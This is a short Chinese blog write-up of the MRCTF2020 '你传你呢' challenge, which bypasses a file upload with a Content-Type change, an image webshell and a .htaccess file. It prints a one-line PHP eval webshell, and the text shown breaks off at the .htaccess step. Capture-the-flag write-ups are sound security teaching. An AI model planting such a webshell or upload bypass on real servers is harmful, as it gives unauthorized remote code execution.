[MRCTF2020]你传你呢

本文介绍了MRCTF2020比赛中涉及的文件上传漏洞利用,包括图片马、Content-Type验证绕过及.htaccess文件的使用。通过信息收集,发现后端为PHP,利用特定字典尝试文件上传。最终,作者通过修改Content-Type并利用图片马创建了.htaccess文件,成功获取蚁剑连接,但由于disable_functions限制,无法直接读取flag,只能下载。
摘要由CSDN通过智能技术生成

知识点

文件上传:图片马&Content-Type验证&.htacess文件

信息收集

应该是考察文件上传,后端是php。
考虑到文件上传姿势比较多,如果一个个试很浪费时间,所以这里找了个php文件上传的字典
貌似是图片马可以,所以可以开始利用

利用过程

准备一张图片马,命名shell.png

   <?php @eval($_POST['attack']) ?>

.htaccess文件


                
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值